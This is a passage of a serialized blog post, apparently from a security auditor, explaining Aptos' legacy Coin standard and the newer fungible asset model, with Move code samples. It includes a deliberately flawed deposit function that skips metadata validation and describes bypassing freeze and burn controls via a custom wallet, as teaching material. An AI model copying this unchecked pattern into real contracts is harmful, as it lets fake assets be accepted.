of.",{"src":68150,"width":12667,"height":12668},"/posts/aptos-guide/title.png","2025-02-10",[13161],{"type":24,"children":68154,"toc":74855},[68155,68168,68173,68182,68188,68216,68289,68329,68363,68524,68543,68624,68664,68692,68709,68714,68722,68727,68733,68754,68834,68867,68875,68888,68893,69277,69282,69287,69293,69298,69310,69414,69452,69455,69473,69781,69786,69798,69804,69830,69851,69856,70035,70055,70061,70081,70093,70098,70104,70116,70179,70206,70230,70451,70454,70473,70583,70640,70776,70803,70809,70835,71079,71107,71409,71442,71456,71482,71515,71822,71834,72111,72125,72442,72461,72467,72499,72539,72640,72660,72780,72797,72871,72883,72971,72992,72998,73003,73008,73025,73046,73417,73476,73481,73932,73937,73973,73979,73991,74013,74039,74246,74260,74515,74527,74554,74705,74724,74754,74758,74769,74774,74787,74851],{"type":27,"tag":36,"props":68156,"children":68157},{},[68158,68160,68166],{"type":33,"value":68159},"Aptos’ fungible asset model is a complex component of its ecosystem, designed to address the limitations of its predecessor — the ",{"type":27,"tag":84,"props":68161,"children":68163},{"className":68162},[],[68164],{"type":33,"value":68165},"coin",{"type":33,"value":68167}," standard. While the new model aims to enhance functionality and security, it also comes with its own set of challenges.",{"type":27,"tag":36,"props":68169,"children":68170},{},[68171],{"type":33,"value":68172},"In this blog post, we'll closely examine Aptos's coin and fungible asset models, exploring their history and connection. We will examine key aspects of the fungible asset framework, including real-world examples of vulnerabilities that were identified and addressed, with the goal of improving security and reliability — all to help you build more secure and reliable applications.",{"type":27,"tag":68174,"props":68175,"children":68176},"important",{},[68177],{"type":27,"tag":36,"props":68178,"children":68179},{},[68180],{"type":33,"value":68181},"All issues mentioned were identified and addressed during Aptos' rigorous pre-release audits, demonstrating the project's dedication to delivering a robust and secure environment from day one.",{"type":27,"tag":28,"props":68183,"children":68185},{"id":68184},"aptos-coin-standard",[68186],{"type":33,"value":68187},"Aptos Coin standard",{"type":27,"tag":36,"props":68189,"children":68190},{},[68191,68193,68199,68201,68206,68207,68214],{"type":33,"value":68192},"In the beginning, Aptos used ",{"type":27,"tag":84,"props":68194,"children":68196},{"className":68195},[],[68197],{"type":33,"value":68198},"Coin",{"type":33,"value":68200},". It is still in use, although it is now considered \"legacy\". ",{"type":27,"tag":84,"props":68202,"children":68204},{"className":68203},[],[68205],{"type":33,"value":68198},{"type":33,"value":12784},{"type":27,"tag":47,"props":68208,"children":68211},{"href":68209,"rel":68210},"https://github.com/aptos-labs/aptos-core/blob/1381c93fd5a656f16fb326d4ffe371947554a330/aptos-move/framework/aptos-framework/sources/coin.move#L119-L123",[51],[68212],{"type":33,"value":68213},"defined",{"type":33,"value":68215}," in Aptos as follows:",{"type":27,"tag":101,"props":68217,"children":68219},{"className":10270,"code":68218,"language":10269,"meta":7,"style":7},"struct Coin\u003Cphantom CoinType> has store {\n value: u64,\n}\n",[68220],{"type":27,"tag":84,"props":68221,"children":68222},{"__ignoreMap":7},[68223,68262,68282],{"type":27,"tag":207,"props":68224,"children":68225},{"class":209,"line":210},[68226,68230,68234,68238,68242,68246,68250,68254,68258],{"type":27,"tag":207,"props":68227,"children":68228},{"style":214},[68229],{"type":33,"value":16677},{"type":27,"tag":207,"props":68231,"children":68232},{"style":8920},[68233],{"type":33,"value":13085},{"type":27,"tag":207,"props":68235,"children":68236},{"style":238},[68237],{"type":33,"value":9257},{"type":27,"tag":207,"props":68239,"children":68240},{"style":220},[68241],{"type":33,"value":13094},{"type":27,"tag":207,"props":68243,"children":68244},{"style":8920},[68245],{"type":33,"value":13099},{"type":27,"tag":207,"props":68247,"children":68248},{"style":238},[68249],{"type":33,"value":9316},{"type":27,"tag":207,"props":68251,"children":68252},{"style":220},[68253],{"type":33,"value":13108},{"type":27,"tag":207,"props":68255,"children":68256},{"style":220},[68257],{"type":33,"value":13113},{"type":27,"tag":207,"props":68259,"children":68260},{"style":238},[68261],{"type":33,"value":384},{"type":27,"tag":207,"props":68263,"children":68264},{"class":209,"line":244},[68265,68270,68274,68278],{"type":27,"tag":207,"props":68266,"children":68267},{"style":220},[68268],{"type":33,"value":68269}," value",{"type":27,"tag":207,"props":68271,"children":68272},{"style":226},[68273],{"type":33,"value":736},{"type":27,"tag":207,"props":68275,"children":68276},{"style":8920},[68277],{"type":33,"value":13142},{"type":27,"tag":207,"props":68279,"children":68280},{"style":238},[68281],{"type":33,"value":1842},{"type":27,"tag":207,"props":68283,"children":68284},{"class":209,"line":270},[68285],{"type":27,"tag":207,"props":68286,"children":68287},{"style":238},[68288],{"type":33,"value":451},{"type":27,"tag":36,"props":68290,"children":68291},{},[68292,68294,68299,68301,68307,68308,68314,68316,68321,68323,68328],{"type":33,"value":68293},"Aptos distinguishes coins by their type (",{"type":27,"tag":84,"props":68295,"children":68297},{"className":68296},[],[68298],{"type":33,"value":13865},{"type":33,"value":68300},") at compile time. For example, ",{"type":27,"tag":84,"props":68302,"children":68304},{"className":68303},[],[68305],{"type":33,"value":68306},"Coin\u003COtter>",{"type":33,"value":1131},{"type":27,"tag":84,"props":68309,"children":68311},{"className":68310},[],[68312],{"type":33,"value":68313},"Coin\u003CWeasel>",{"type":33,"value":68315}," represent different coins, and you cannot pass a ",{"type":27,"tag":84,"props":68317,"children":68319},{"className":68318},[],[68320],{"type":33,"value":68313},{"type":33,"value":68322}," to a function expecting ",{"type":27,"tag":84,"props":68324,"children":68326},{"className":68325},[],[68327],{"type":33,"value":68306},{"type":33,"value":1041},{"type":27,"tag":36,"props":68330,"children":68331},{},[68332,68334,68339,68341,68346,68348,68353,68355,68361],{"type":33,"value":68333},"The type signature reveals why ",{"type":27,"tag":84,"props":68335,"children":68337},{"className":68336},[],[68338],{"type":33,"value":68198},{"type":33,"value":68340}," has become a legacy standard. ",{"type":27,"tag":84,"props":68342,"children":68344},{"className":68343},[],[68345],{"type":33,"value":68198},{"type":33,"value":68347}," has only the ",{"type":27,"tag":84,"props":68349,"children":68351},{"className":68350},[],[68352],{"type":33,"value":13222},{"type":33,"value":68354}," ability and uses a ",{"type":27,"tag":84,"props":68356,"children":68358},{"className":68357},[],[68359],{"type":33,"value":68360},"CoinStore",{"type":33,"value":68362}," wrapper to store the coin and metadata:",{"type":27,"tag":101,"props":68364,"children":68366},{"className":10270,"code":68365,"language":10269,"meta":7,"style":7},"struct CoinStore\u003Cphantom CoinType> has key {\n coin: Coin\u003CCoinType>,\n frozen: bool,\n deposit_events: EventHandle\u003CDepositEvent>,\n withdraw_events: EventHandle\u003CWithdrawEvent>,\n}\n",[68367],{"type":27,"tag":84,"props":68368,"children":68369},{"__ignoreMap":7},[68370,68410,68438,68458,68488,68517],{"type":27,"tag":207,"props":68371,"children":68372},{"class":209,"line":210},[68373,68377,68382,68386,68390,68394,68398,68402,68406],{"type":27,"tag":207,"props":68374,"children":68375},{"style":214},[68376],{"type":33,"value":16677},{"type":27,"tag":207,"props":68378,"children":68379},{"style":8920},[68380],{"type":33,"value":68381}," CoinStore",{"type":27,"tag":207,"props":68383,"children":68384},{"style":238},[68385],{"type":33,"value":9257},{"type":27,"tag":207,"props":68387,"children":68388},{"style":220},[68389],{"type":33,"value":13094},{"type":27,"tag":207,"props":68391,"children":68392},{"style":8920},[68393],{"type":33,"value":13099},{"type":27,"tag":207,"props":68395,"children":68396},{"style":238},[68397],{"type":33,"value":9316},{"type":27,"tag":207,"props":68399,"children":68400},{"style":220},[68401],{"type":33,"value":13108},{"type":27,"tag":207,"props":68403,"children":68404},{"style":220},[68405],{"type":33,"value":13213},{"type":27,"tag":207,"props":68407,"children":68408},{"style":238},[68409],{"type":33,"value":384},{"type":27,"tag":207,"props":68411,"children":68412},{"class":209,"line":244},[68413,68418,68422,68426,68430,68434],{"type":27,"tag":207,"props":68414,"children":68415},{"style":220},[68416],{"type":33,"value":68417}," coin",{"type":27,"tag":207,"props":68419,"children":68420},{"style":226},[68421],{"type":33,"value":736},{"type":27,"tag":207,"props":68423,"children":68424},{"style":8920},[68425],{"type":33,"value":13085},{"type":27,"tag":207,"props":68427,"children":68428},{"style":238},[68429],{"type":33,"value":9257},{"type":27,"tag":207,"props":68431,"children":68432},{"style":8920},[68433],{"type":33,"value":13865},{"type":27,"tag":207,"props":68435,"children":68436},{"style":238},[68437],{"type":33,"value":13420},{"type":27,"tag":207,"props":68439,"children":68440},{"class":209,"line":270},[68441,68446,68450,68454],{"type":27,"tag":207,"props":68442,"children":68443},{"style":220},[68444],{"type":33,"value":68445}," frozen",{"type":27,"tag":207,"props":68447,"children":68448},{"style":226},[68449],{"type":33,"value":736},{"type":27,"tag":207,"props":68451,"children":68452},{"style":8920},[68453],{"type":33,"value":19327},{"type":27,"tag":207,"props":68455,"children":68456},{"style":238},[68457],{"type":33,"value":1842},{"type":27,"tag":207,"props":68459,"children":68460},{"class":209,"line":296},[68461,68466,68470,68475,68479,68484],{"type":27,"tag":207,"props":68462,"children":68463},{"style":220},[68464],{"type":33,"value":68465}," deposit_events",{"type":27,"tag":207,"props":68467,"children":68468},{"style":226},[68469],{"type":33,"value":736},{"type":27,"tag":207,"props":68471,"children":68472},{"style":8920},[68473],{"type":33,"value":68474}," EventHandle",{"type":27,"tag":207,"props":68476,"children":68477},{"style":238},[68478],{"type":33,"value":9257},{"type":27,"tag":207,"props":68480,"children":68481},{"style":8920},[68482],{"type":33,"value":68483},"DepositEvent",{"type":27,"tag":207,"props":68485,"children":68486},{"style":238},[68487],{"type":33,"value":13420},{"type":27,"tag":207,"props":68489,"children":68490},{"class":209,"line":445},[68491,68496,68500,68504,68508,68513],{"type":27,"tag":207,"props":68492,"children":68493},{"style":220},[68494],{"type":33,"value":68495}," withdraw_events",{"type":27,"tag":207,"props":68497,"children":68498},{"style":226},[68499],{"type":33,"value":736},{"type":27,"tag":207,"props":68501,"children":68502},{"style":8920},[68503],{"type":33,"value":68474},{"type":27,"tag":207,"props":68505,"children":68506},{"style":238},[68507],{"type":33,"value":9257},{"type":27,"tag":207,"props":68509,"children":68510},{"style":8920},[68511],{"type":33,"value":68512},"WithdrawEvent",{"type":27,"tag":207,"props":68514,"children":68515},{"style":238},[68516],{"type":33,"value":13420},{"type":27,"tag":207,"props":68518,"children":68519},{"class":209,"line":867},[68520],{"type":27,"tag":207,"props":68521,"children":68522},{"style":238},[68523],{"type":33,"value":451},{"type":27,"tag":36,"props":68525,"children":68526},{},[68527,68529,68534,68536,68541],{"type":33,"value":68528},"However, an astute reader would note that this isn't the only place a ",{"type":27,"tag":84,"props":68530,"children":68532},{"className":68531},[],[68533],{"type":33,"value":68198},{"type":33,"value":68535}," can be stored. You can create your own ",{"type":27,"tag":84,"props":68537,"children":68539},{"className":68538},[],[68540],{"type":33,"value":68198},{"type":33,"value":68542}," wallet, which could look like this:",{"type":27,"tag":101,"props":68544,"children":68546},{"className":10270,"code":68545,"language":10269,"meta":7,"style":7},"struct DefinitelyLegitCoinStore\u003Cphantom CoinType> has key {\n coin: Coin\u003CCoinType>\n}\n",[68547],{"type":27,"tag":84,"props":68548,"children":68549},{"__ignoreMap":7},[68550,68590,68617],{"type":27,"tag":207,"props":68551,"children":68552},{"class":209,"line":210},[68553,68557,68562,68566,68570,68574,68578,68582,68586],{"type":27,"tag":207,"props":68554,"children":68555},{"style":214},[68556],{"type":33,"value":16677},{"type":27,"tag":207,"props":68558,"children":68559},{"style":8920},[68560],{"type":33,"value":68561}," DefinitelyLegitCoinStore",{"type":27,"tag":207,"props":68563,"children":68564},{"style":238},[68565],{"type":33,"value":9257},{"type":27,"tag":207,"props":68567,"children":68568},{"style":220},[68569],{"type":33,"value":13094},{"type":27,"tag":207,"props":68571,"children":68572},{"style":8920},[68573],{"type":33,"value":13099},{"type":27,"tag":207,"props":68575,"children":68576},{"style":238},[68577],{"type":33,"value":9316},{"type":27,"tag":207,"props":68579,"children":68580},{"style":220},[68581],{"type":33,"value":13108},{"type":27,"tag":207,"props":68583,"children":68584},{"style":220},[68585],{"type":33,"value":13213},{"type":27,"tag":207,"props":68587,"children":68588},{"style":238},[68589],{"type":33,"value":384},{"type":27,"tag":207,"props":68591,"children":68592},{"class":209,"line":244},[68593,68597,68601,68605,68609,68613],{"type":27,"tag":207,"props":68594,"children":68595},{"style":220},[68596],{"type":33,"value":68417},{"type":27,"tag":207,"props":68598,"children":68599},{"style":226},[68600],{"type":33,"value":736},{"type":27,"tag":207,"props":68602,"children":68603},{"style":8920},[68604],{"type":33,"value":13085},{"type":27,"tag":207,"props":68606,"children":68607},{"style":238},[68608],{"type":33,"value":9257},{"type":27,"tag":207,"props":68610,"children":68611},{"style":8920},[68612],{"type":33,"value":13865},{"type":27,"tag":207,"props":68614,"children":68615},{"style":238},[68616],{"type":33,"value":13274},{"type":27,"tag":207,"props":68618,"children":68619},{"class":209,"line":270},[68620],{"type":27,"tag":207,"props":68621,"children":68622},{"style":238},[68623],{"type":33,"value":451},{"type":27,"tag":36,"props":68625,"children":68626},{},[68627,68632,68634,68640,68642,68647,68649,68655,68657,68662],{"type":27,"tag":84,"props":68628,"children":68630},{"className":68629},[],[68631],{"type":33,"value":68360},{"type":33,"value":68633}," includes a ",{"type":27,"tag":84,"props":68635,"children":68637},{"className":68636},[],[68638],{"type":33,"value":68639},"frozen",{"type":33,"value":68641}," field, allowing the issuer to block transfers to and from the store. ",{"type":27,"tag":84,"props":68643,"children":68645},{"className":68644},[],[68646],{"type":33,"value":68360},{"type":33,"value":68648}," is also required for a ",{"type":27,"tag":84,"props":68650,"children":68652},{"className":68651},[],[68653],{"type":33,"value":68654},"burn_from",{"type":33,"value":68656}," operation, which withdraws the ",{"type":27,"tag":84,"props":68658,"children":68660},{"className":68659},[],[68661],{"type":33,"value":68165},{"type":33,"value":68663}," from the store and destroys it. Freezing and burning operations are essential i.e. for stablecoin issuers, using them as compliance tools to prevent unauthorized or illegal transactions and adhere to legal orders. Being able to bypass these restrictions with a custom wallet is an issue and can lead to severe consequences.",{"type":27,"tag":36,"props":68665,"children":68666},{},[68667,68669,68674,68676,68683,68685,68690],{"type":33,"value":68668},"Storing ",{"type":27,"tag":84,"props":68670,"children":68672},{"className":68671},[],[68673],{"type":33,"value":68165},{"type":33,"value":68675}," in a custom wallet is also a problem in terms of off-chain observability, as finding the stored coins in such setup is a difficult task. This is how the fungible asset ",{"type":27,"tag":47,"props":68677,"children":68680},{"href":68678,"rel":68679},"https://github.com/aptos-foundation/AIPs/blob/ac3da48db226cf2dbaf4df6f1f5109a4f1b2e604/aips/aip-21.md",[51],[68681],{"type":33,"value":68682},"AIP-21",{"type":33,"value":68684}," summarizes the ",{"type":27,"tag":84,"props":68686,"children":68688},{"className":68687},[],[68689],{"type":33,"value":68165},{"type":33,"value":68691}," problems:",{"type":27,"tag":10222,"props":68693,"children":68694},{},[68695,68704],{"type":27,"tag":36,"props":68696,"children":68697},{},[68698,68702],{"type":27,"tag":207,"props":68699,"children":68700},{},[68701],{"type":33,"value":16867},{"type":33,"value":68703}," coin module has been deemed insufficient for current and future needs due to the rigidity of Move structs and the inherently poor extensibility.",{"type":27,"tag":36,"props":68705,"children":68706},{},[68707],{"type":33,"value":68708},"The existing Coin struct leverages the store ability allowing for assets on-chain to become untraceable. Creating challenges to off-chain observability and on-chain management, such as freezing or burning.",{"type":27,"tag":36,"props":68710,"children":68711},{},[68712],{"type":33,"value":68713},"And declares, that:",{"type":27,"tag":10222,"props":68715,"children":68716},{},[68717],{"type":27,"tag":36,"props":68718,"children":68719},{},[68720],{"type":33,"value":68721},"Fungible assets addresses these issues.",{"type":27,"tag":36,"props":68723,"children":68724},{},[68725],{"type":33,"value":68726},"Let's find out whether this is indeed the case.",{"type":27,"tag":28,"props":68728,"children":68730},{"id":68729},"the-fungible-assets",[68731],{"type":33,"value":68732},"The fungible assets",{"type":27,"tag":36,"props":68734,"children":68735},{},[68736,68738,68744,68746,68753],{"type":33,"value":68737},"Aptos designed fungible assets as a new token standard to solve these problems. A ",{"type":27,"tag":84,"props":68739,"children":68741},{"className":68740},[],[68742],{"type":33,"value":68743},"FungibleAsset",{"type":33,"value":68745}," uses the ",{"type":27,"tag":47,"props":68747,"children":68750},{"href":68748,"rel":68749},"https://medium.com/@borispovod/move-hot-potato-pattern-bbc48a48d93c",[51],[68751],{"type":33,"value":68752},"hot-potato pattern",{"type":33,"value":736},{"type":27,"tag":101,"props":68755,"children":68757},{"className":10270,"code":68756,"language":10269,"meta":7,"style":7},"struct FungibleAsset {\n metadata: Object\u003CMetadata>,\n amount: u64,\n}\n",[68758],{"type":27,"tag":84,"props":68759,"children":68760},{"__ignoreMap":7},[68761,68777,68807,68827],{"type":27,"tag":207,"props":68762,"children":68763},{"class":209,"line":210},[68764,68768,68773],{"type":27,"tag":207,"props":68765,"children":68766},{"style":214},[68767],{"type":33,"value":16677},{"type":27,"tag":207,"props":68769,"children":68770},{"style":8920},[68771],{"type":33,"value":68772}," FungibleAsset",{"type":27,"tag":207,"props":68774,"children":68775},{"style":238},[68776],{"type":33,"value":384},{"type":27,"tag":207,"props":68778,"children":68779},{"class":209,"line":244},[68780,68785,68789,68794,68798,68803],{"type":27,"tag":207,"props":68781,"children":68782},{"style":220},[68783],{"type":33,"value":68784}," metadata",{"type":27,"tag":207,"props":68786,"children":68787},{"style":226},[68788],{"type":33,"value":736},{"type":27,"tag":207,"props":68790,"children":68791},{"style":8920},[68792],{"type":33,"value":68793}," Object",{"type":27,"tag":207,"props":68795,"children":68796},{"style":238},[68797],{"type":33,"value":9257},{"type":27,"tag":207,"props":68799,"children":68800},{"style":8920},[68801],{"type":33,"value":68802},"Metadata",{"type":27,"tag":207,"props":68804,"children":68805},{"style":238},[68806],{"type":33,"value":13420},{"type":27,"tag":207,"props":68808,"children":68809},{"class":209,"line":270},[68810,68815,68819,68823],{"type":27,"tag":207,"props":68811,"children":68812},{"style":220},[68813],{"type":33,"value":68814}," amount",{"type":27,"tag":207,"props":68816,"children":68817},{"style":226},[68818],{"type":33,"value":736},{"type":27,"tag":207,"props":68820,"children":68821},{"style":8920},[68822],{"type":33,"value":13142},{"type":27,"tag":207,"props":68824,"children":68825},{"style":238},[68826],{"type":33,"value":1842},{"type":27,"tag":207,"props":68828,"children":68829},{"class":209,"line":296},[68830],{"type":27,"tag":207,"props":68831,"children":68832},{"style":238},[68833],{"type":33,"value":451},{"type":27,"tag":36,"props":68835,"children":68836},{},[68837,68839,68844,68845,68850,68852,68857,68859,68866],{"type":33,"value":68838},"Unlike ",{"type":27,"tag":84,"props":68840,"children":68842},{"className":68841},[],[68843],{"type":33,"value":68198},{"type":33,"value":1123},{"type":27,"tag":84,"props":68846,"children":68848},{"className":68847},[],[68849],{"type":33,"value":68743},{"type":33,"value":68851}," types are defined at runtime through the ",{"type":27,"tag":84,"props":68853,"children":68855},{"className":68854},[],[68856],{"type":33,"value":68802},{"type":33,"value":68858}," field. This change was meant to ",{"type":27,"tag":47,"props":68860,"children":68863},{"href":68861,"rel":68862},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-21.md#specification",[51],[68864],{"type":33,"value":68865},"enhance extensibility",{"type":33,"value":736},{"type":27,"tag":10222,"props":68868,"children":68869},{},[68870],{"type":27,"tag":36,"props":68871,"children":68872},{},[68873],{"type":33,"value":68874},"An object can have other resources attached to provide additional context. For example, the metadata could define a gem of a given type, color, quality, and rarity, where ownership indicates the quantity or total weight owned of that type of gem.",{"type":27,"tag":36,"props":68876,"children":68877},{},[68878,68880,68886],{"type":33,"value":68879},"An important implication is that functions accepting ",{"type":27,"tag":84,"props":68881,"children":68883},{"className":68882},[],[68884],{"type":33,"value":68885},"FungibleAssets",{"type":33,"value":68887}," must verify the metadata to ensure valid assets.",{"type":27,"tag":36,"props":68889,"children":68890},{},[68891],{"type":33,"value":68892},"Let's consider a possible implementation of a protocol that takes in assets.",{"type":27,"tag":101,"props":68894,"children":68896},{"className":10270,"code":68895,"language":10269,"meta":7,"style":7},"public fun deposit\u003CT: key>(\n sender: &signer, fa: FungibleAsset\n) acquires [...] {\n assert_not_paused();\n \n let fa_amount = fungible_asset::amount(&fa);\n let sender_address = address_of(sender);\n check_compliance(fa_amount, sender_address);\n \n increase_deposit(get_vault(sender_address), fa_amount);\n \n primary_fungible_store::deposit(global_vault_address(), fa);\n \n event::emit(Deposit {sender_address, fa_amount})\n}\n",[68897],{"type":27,"tag":84,"props":68898,"children":68899},{"__ignoreMap":7},[68900,68937,68975,68999,69011,69019,69064,69098,69128,69135,69172,69179,69217,69224,69270],{"type":27,"tag":207,"props":68901,"children":68902},{"class":209,"line":210},[68903,68908,68912,68917,68921,68925,68929,68933],{"type":27,"tag":207,"props":68904,"children":68905},{"style":220},[68906],{"type":33,"value":68907},"public",{"type":27,"tag":207,"props":68909,"children":68910},{"style":220},[68911],{"type":33,"value":13489},{"type":27,"tag":207,"props":68913,"children":68914},{"style":220},[68915],{"type":33,"value":68916}," deposit",{"type":27,"tag":207,"props":68918,"children":68919},{"style":238},[68920],{"type":33,"value":9257},{"type":27,"tag":207,"props":68922,"children":68923},{"style":8920},[68924],{"type":33,"value":13269},{"type":27,"tag":207,"props":68926,"children":68927},{"style":226},[68928],{"type":33,"value":736},{"type":27,"tag":207,"props":68930,"children":68931},{"style":220},[68932],{"type":33,"value":13213},{"type":27,"tag":207,"props":68934,"children":68935},{"style":238},[68936],{"type":33,"value":13870},{"type":27,"tag":207,"props":68938,"children":68939},{"class":209,"line":244},[68940,68945,68949,68953,68957,68961,68966,68970],{"type":27,"tag":207,"props":68941,"children":68942},{"style":220},[68943],{"type":33,"value":68944}," sender",{"type":27,"tag":207,"props":68946,"children":68947},{"style":226},[68948],{"type":33,"value":736},{"type":27,"tag":207,"props":68950,"children":68951},{"style":226},[68952],{"type":33,"value":14423},{"type":27,"tag":207,"props":68954,"children":68955},{"style":220},[68956],{"type":33,"value":14428},{"type":27,"tag":207,"props":68958,"children":68959},{"style":238},[68960],{"type":33,"value":1123},{"type":27,"tag":207,"props":68962,"children":68963},{"style":220},[68964],{"type":33,"value":68965},"fa",{"type":27,"tag":207,"props":68967,"children":68968},{"style":226},[68969],{"type":33,"value":736},{"type":27,"tag":207,"props":68971,"children":68972},{"style":8920},[68973],{"type":33,"value":68974}," FungibleAsset\n",{"type":27,"tag":207,"props":68976,"children":68977},{"class":209,"line":270},[68978,68982,68986,68990,68994],{"type":27,"tag":207,"props":68979,"children":68980},{"style":238},[68981],{"type":33,"value":2222},{"type":27,"tag":207,"props":68983,"children":68984},{"style":220},[68985],{"type":33,"value":13626},{"type":27,"tag":207,"props":68987,"children":68988},{"style":238},[68989],{"type":33,"value":30305},{"type":27,"tag":207,"props":68991,"children":68992},{"style":226},[68993],{"type":33,"value":16867},{"type":27,"tag":207,"props":68995,"children":68996},{"style":238},[68997],{"type":33,"value":68998},"] {\n",{"type":27,"tag":207,"props":69000,"children":69001},{"class":209,"line":296},[69002,69007],{"type":27,"tag":207,"props":69003,"children":69004},{"style":1335},[69005],{"type":33,"value":69006}," assert_not_paused",{"type":27,"tag":207,"props":69008,"children":69009},{"style":238},[69010],{"type":33,"value":4301},{"type":27,"tag":207,"props":69012,"children":69013},{"class":209,"line":445},[69014],{"type":27,"tag":207,"props":69015,"children":69016},{"style":238},[69017],{"type":33,"value":69018}," \n",{"type":27,"tag":207,"props":69020,"children":69021},{"class":209,"line":867},[69022,69026,69031,69035,69040,69044,69048,69052,69056,69060],{"type":27,"tag":207,"props":69023,"children":69024},{"style":214},[69025],{"type":33,"value":10290},{"type":27,"tag":207,"props":69027,"children":69028},{"style":220},[69029],{"type":33,"value":69030}," fa_amount",{"type":27,"tag":207,"props":69032,"children":69033},{"style":226},[69034],{"type":33,"value":229},{"type":27,"tag":207,"props":69036,"children":69037},{"style":238},[69038],{"type":33,"value":69039}," fungible_asset",{"type":27,"tag":207,"props":69041,"children":69042},{"style":226},[69043],{"type":33,"value":10768},{"type":27,"tag":207,"props":69045,"children":69046},{"style":1335},[69047],{"type":33,"value":27578},{"type":27,"tag":207,"props":69049,"children":69050},{"style":238},[69051],{"type":33,"value":1343},{"type":27,"tag":207,"props":69053,"children":69054},{"style":226},[69055],{"type":33,"value":10398},{"type":27,"tag":207,"props":69057,"children":69058},{"style":220},[69059],{"type":33,"value":68965},{"type":27,"tag":207,"props":69061,"children":69062},{"style":238},[69063],{"type":33,"value":1455},{"type":27,"tag":207,"props":69065,"children":69066},{"class":209,"line":892},[69067,69071,69076,69080,69085,69089,69094],{"type":27,"tag":207,"props":69068,"children":69069},{"style":214},[69070],{"type":33,"value":10290},{"type":27,"tag":207,"props":69072,"children":69073},{"style":220},[69074],{"type":33,"value":69075}," sender_address",{"type":27,"tag":207,"props":69077,"children":69078},{"style":226},[69079],{"type":33,"value":229},{"type":27,"tag":207,"props":69081,"children":69082},{"style":1335},[69083],{"type":33,"value":69084}," address_of",{"type":27,"tag":207,"props":69086,"children":69087},{"style":238},[69088],{"type":33,"value":1343},{"type":27,"tag":207,"props":69090,"children":69091},{"style":220},[69092],{"type":33,"value":69093},"sender",{"type":27,"tag":207,"props":69095,"children":69096},{"style":238},[69097],{"type":33,"value":1455},{"type":27,"tag":207,"props":69099,"children":69100},{"class":209,"line":1475},[69101,69106,69110,69115,69119,69124],{"type":27,"tag":207,"props":69102,"children":69103},{"style":1335},[69104],{"type":33,"value":69105}," check_compliance",{"type":27,"tag":207,"props":69107,"children":69108},{"style":238},[69109],{"type":33,"value":1343},{"type":27,"tag":207,"props":69111,"children":69112},{"style":220},[69113],{"type":33,"value":69114},"fa_amount",{"type":27,"tag":207,"props":69116,"children":69117},{"style":238},[69118],{"type":33,"value":1123},{"type":27,"tag":207,"props":69120,"children":69121},{"style":220},[69122],{"type":33,"value":69123},"sender_address",{"type":27,"tag":207,"props":69125,"children":69126},{"style":238},[69127],{"type":33,"value":1455},{"type":27,"tag":207,"props":69129,"children":69130},{"class":209,"line":2065},[69131],{"type":27,"tag":207,"props":69132,"children":69133},{"style":238},[69134],{"type":33,"value":69018},{"type":27,"tag":207,"props":69136,"children":69137},{"class":209,"line":2092},[69138,69143,69147,69152,69156,69160,69164,69168],{"type":27,"tag":207,"props":69139,"children":69140},{"style":1335},[69141],{"type":33,"value":69142}," increase_deposit",{"type":27,"tag":207,"props":69144,"children":69145},{"style":238},[69146],{"type":33,"value":1343},{"type":27,"tag":207,"props":69148,"children":69149},{"style":1335},[69150],{"type":33,"value":69151},"get_vault",{"type":27,"tag":207,"props":69153,"children":69154},{"style":238},[69155],{"type":33,"value":1343},{"type":27,"tag":207,"props":69157,"children":69158},{"style":220},[69159],{"type":33,"value":69123},{"type":27,"tag":207,"props":69161,"children":69162},{"style":238},[69163],{"type":33,"value":22452},{"type":27,"tag":207,"props":69165,"children":69166},{"style":220},[69167],{"type":33,"value":69114},{"type":27,"tag":207,"props":69169,"children":69170},{"style":238},[69171],{"type":33,"value":1455},{"type":27,"tag":207,"props":69173,"children":69174},{"class":209,"line":2130},[69175],{"type":27,"tag":207,"props":69176,"children":69177},{"style":238},[69178],{"type":33,"value":69018},{"type":27,"tag":207,"props":69180,"children":69181},{"class":209,"line":2168},[69182,69187,69191,69196,69200,69205,69209,69213],{"type":27,"tag":207,"props":69183,"children":69184},{"style":238},[69185],{"type":33,"value":69186}," primary_fungible_store",{"type":27,"tag":207,"props":69188,"children":69189},{"style":226},[69190],{"type":33,"value":10768},{"type":27,"tag":207,"props":69192,"children":69193},{"style":1335},[69194],{"type":33,"value":69195},"deposit",{"type":27,"tag":207,"props":69197,"children":69198},{"style":238},[69199],{"type":33,"value":1343},{"type":27,"tag":207,"props":69201,"children":69202},{"style":1335},[69203],{"type":33,"value":69204},"global_vault_address",{"type":27,"tag":207,"props":69206,"children":69207},{"style":238},[69208],{"type":33,"value":25646},{"type":27,"tag":207,"props":69210,"children":69211},{"style":220},[69212],{"type":33,"value":68965},{"type":27,"tag":207,"props":69214,"children":69215},{"style":238},[69216],{"type":33,"value":1455},{"type":27,"tag":207,"props":69218,"children":69219},{"class":209,"line":4095},[69220],{"type":27,"tag":207,"props":69221,"children":69222},{"style":238},[69223],{"type":33,"value":69018},{"type":27,"tag":207,"props":69225,"children":69226},{"class":209,"line":4103},[69227,69232,69236,69241,69245,69250,69254,69258,69262,69266],{"type":27,"tag":207,"props":69228,"children":69229},{"style":238},[69230],{"type":33,"value":69231}," event",{"type":27,"tag":207,"props":69233,"children":69234},{"style":226},[69235],{"type":33,"value":10768},{"type":27,"tag":207,"props":69237,"children":69238},{"style":1335},[69239],{"type":33,"value":69240},"emit",{"type":27,"tag":207,"props":69242,"children":69243},{"style":238},[69244],{"type":33,"value":1343},{"type":27,"tag":207,"props":69246,"children":69247},{"style":8920},[69248],{"type":33,"value":69249},"Deposit",{"type":27,"tag":207,"props":69251,"children":69252},{"style":238},[69253],{"type":33,"value":52459},{"type":27,"tag":207,"props":69255,"children":69256},{"style":220},[69257],{"type":33,"value":69123},{"type":27,"tag":207,"props":69259,"children":69260},{"style":238},[69261],{"type":33,"value":1123},{"type":27,"tag":207,"props":69263,"children":69264},{"style":220},[69265],{"type":33,"value":69114},{"type":27,"tag":207,"props":69267,"children":69268},{"style":238},[69269],{"type":33,"value":40278},{"type":27,"tag":207,"props":69271,"children":69272},{"class":209,"line":4154},[69273],{"type":27,"tag":207,"props":69274,"children":69275},{"style":238},[69276],{"type":33,"value":451},{"type":27,"tag":36,"props":69278,"children":69279},{},[69280],{"type":33,"value":69281},"Do you see any problems here? The application does not validate or differentiate fungible assets using their metadata, which causes all fungible asset deposits to be treated as identical.",{"type":27,"tag":36,"props":69283,"children":69284},{},[69285],{"type":33,"value":69286},"While these bugs aren't partiularly complex, they do represent an additional vulnerability class that must be checked for.",{"type":27,"tag":28,"props":69288,"children":69290},{"id":69289},"fungible-stores",[69291],{"type":33,"value":69292},"Fungible 